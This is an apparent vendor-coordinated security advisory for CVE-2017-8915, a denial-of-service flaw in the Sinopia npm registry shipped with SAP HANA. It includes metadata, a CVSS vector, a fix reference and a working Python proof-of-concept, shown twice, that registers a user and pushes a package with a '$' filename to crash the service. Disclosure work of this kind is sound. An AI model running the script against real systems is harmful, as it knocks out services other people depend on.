Application: SAP HANA **Versions Affected:**SAP HANA 1 and SAP HANA 2 Vendor URL: SAP **Bug:**DoS **Reported:**13.12.2016 **Vendor response:**14.12.2016 **Date of Public Advisory:**14.02.2017 **Reference: **SAP Security Note 2407694 Authors: Mikhail Medvedev (ERPScan), Mathieu Geli (ERPScan)
Class: DoS
Impact: Denial of Service
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-8915
CVSS Base Score v3: 8.3 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | Low (L) |
An authenticated user to the SAP HANA XS sinopia npm registry service can crash the service by pushing a specific package.
An attacker can use a Denial of service vulnerability for terminating the process of the Sinopia component. For this time, nobody can use this Sinopia service, which impacts some WebIDE capabilities like build features.
HDB 1.00
HDB 2.00
To correct this vulnerability, install SAP Security Note 2407694.
SAP HANA npm registry sinopia is crashing when a user is pushing package with filenames containing ‘$’ or ‘%’ (other special chars were not tested).
Python
#!/usr/bin/env python # # NPM registry ‘sinopia’ crash by triggering an # assert in their filename verification routine # # [1478616333170] fatal — uncaught exception, please report this # [1478616333170] AssertionError: false == true # [1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/local-storage.js:347:3) # [1478616333170] at Storage.add_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/storage.js:171:21) # [1478616333170] at create_tarball (/hana/shared/HDP/xs/ea_data/hanapt/executionroot/2b304182-dc70-407a-bc14-553f5b9890ae/app/node_modules/sinopia/lib/index-api.js:339:28) # # Code from local-storage.js: # Storage.prototype.add_tarball = function(name, filename) { # assert(Utils.validate_name(filename)) <-- crash # […] # # – ERPScan import json import requests import random base_url = “http://172.16.100.21:50012” # change the port to your current sinopia port random = random.randint(0, 1000000) packagename = u’fakepackage%s’ % random package_endpoint = “/%s” % packagename createuser_endpoint = “/-/user/org.couchdb.user:dosuser” headers = {“content-type”: “application/json”, “user-agent”: “npm/1.4.21 node/v0.10.25 linux x64”} json_adduser={“name”:“dosuser”, “password”:“dosuser”, “email":"[email protected]”, “_id”:“org.couchdb.user:dosuser”, “type”:“user”} r = requests.put(base_url + createuser_endpoint, headers=headers, data=json.dumps(json_adduser)) print r.status_code, r.text json_data={“_id”:packagename, “name”:packagename, “versions”:{“1.0.%s” % random: “XXX”}, “_attachments”:{ ‘CRASH$’: { “data”:‘AA’, “length”: 2 } } } r = requests.put(base_url + package_endpoint, headers=headers, auth=(‘dosuser’, ‘dosuser’), data=json.dumps(json_data)) print r.status_code, r.text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
#!/usr/bin/env python
import json
import requests
import random
base_url = “http://172.16.100.21:50012” # change the port to your current sinopia port
random = random.randint(0, 1000000)
packagename = u’fakepackage%s’ % random
package_endpoint = “/%s” % packagename
createuser_endpoint = “/-/user/org.couchdb.user:dosuser”
headers = {“content-type”: “application/json”,
“user-agent”: “npm/1.4.21 node/v0.10.25 linux x64”}
json_adduser={“name”:“dosuser”,
“password”:“dosuser”,
“_id”:“org.couchdb.user:dosuser”,
“type”:“user”}
r = requests.put(base_url + createuser_endpoint, headers=headers, data=json.dumps(json_adduser))
print r.status_code, r.text
json_data={“_id”:packagename,
“name”:packagename,
“versions”:{“1.0.%s” % random: “XXX”},
“_attachments”:{
‘CRASH$’: {
“data”:‘AA’,
“length”: 2
}
}
}
r = requests.put(base_url + package_endpoint, headers=headers, auth=(‘dosuser’, ‘dosuser’), data=json.dumps(json_data))
print r.status_code, r.text
—|—